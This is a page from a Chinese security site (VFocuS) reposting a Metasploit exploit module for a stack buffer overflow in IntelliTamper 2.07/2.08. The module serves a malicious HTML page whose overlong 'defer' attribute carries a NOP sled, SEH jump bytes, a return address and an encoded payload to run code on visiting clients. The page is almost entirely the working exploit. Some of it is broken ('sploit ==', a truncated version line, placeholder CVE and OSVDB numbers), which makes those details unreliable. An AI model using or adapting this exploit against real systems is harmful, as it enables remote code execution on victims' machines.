首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
IntelliTamper 2.07/2.08 (defer) Remote Buffer Overflow (meta)
来源:http://www.metasploit.com 作者:Stack 发布时间:2010-01-25  
##
# $Id: IntelliTamper.rb
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

    include Msf::Exploit::Remote::HttpServer::HTML
    include Msf::Exploit::Remote::Seh

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'IntelliTamper 2.07/2.08 (defer) Remote Buffer Overflow ',
            'Description'    => %q{
                    This module exploits a stack overflow in the IntelliTamper.
                    By sending an overly long string to the "defer"
                    script, an attacker may be able to execute arbitrary code.
            },
            'License'        => MSF_LICENSE,
            'Author'         => [ 'Stack, Mountassif Moad' ],
            'Version'        =>  '$Revision
, 'References' => [ [ 'URL', 'http://www.exploit-db.com/exploits/11220'], [ 'CVE', '2009-0' ], [ 'OSVDB', '0' ], [ 'BID', '00, 01' ], [ 'EDB', '11220' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 950, 'BadChars' => "\x00\x3C\x01", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'IntelliTamper 2.07/2.08', { 'Offset' => 6236, 'Ret' => 0x0040103b } ], # intellitamper.exe ], 'DisclosureDate' => 'Jan 22 2009', 'DefaultTarget' => 0)) end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) # Set the exploit buffer sploit == '<html><head><title>loneferret test</title></head><body>' sploit += '<script defer="' sploit += "\x41" * 6236 sploit += make_nops(180) sploit += '\xE9\x55\xFE\xFF\xFF' sploit += '\xeb\xd0\x90\x90' sploit += [target.ret].pack('V') sploit += make_nops(50) sploit += payload.encoded sploit += '">' sploit += '</body></html>' print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, sploit) # Handle the payload handler(cli) end end
 

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·DJ Legend local heap overflow
·SOMPL Player Buffer Overflow
·Invision Power Board remote fi
·IntelliTamper 2.07/2.08 (SEH)
·Windows Live Messenger 2009 Ac
·yPlay 1.0.76 (.mp3) Local Cras
·IntelliTamper 2.07/2.08 (defer
·Pico MP3 Player 1.0 (.mp3 /.pl
·EFS Easy Chat server Universal
·Authentium SafeCentral <= 2.6
·jetAudio 8.0.0.2 Basic Local C
·QtWeb 3.0 Remote DoS/Crash Exp
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved